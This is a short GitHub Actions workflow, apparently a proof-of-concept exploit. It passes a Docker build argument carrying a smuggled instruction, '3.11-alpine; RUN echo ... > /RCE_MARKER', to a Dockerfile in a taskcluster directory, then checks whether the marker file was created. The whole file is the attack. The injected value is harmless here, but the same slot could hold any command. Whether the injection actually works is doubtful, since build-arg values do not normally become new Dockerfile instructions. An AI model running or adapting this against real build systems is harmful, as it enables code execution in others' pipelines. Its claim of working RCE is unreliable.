name: RCE via PYTHON_VERSION
on: push

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Trigger RCE in Docker build
        run: |
          # Create a malicious PYTHON_VERSION with command injection
          MALICIOUS_ARG="3.11-alpine; RUN echo 'RCE SUCCESS' > /RCE_MARKER"

          # Build the image using the vulnerable Dockerfile
          docker build \
            --build-arg PYTHON_VERSION="${MALICIOUS_ARG}" \
            -t hacked-image \
            ./taskcluster/docker/python

          # Confirm if the command ran by checking the marker file
          docker run --rm hacked-image cat /RCE_MARKER || echo "No RCE"
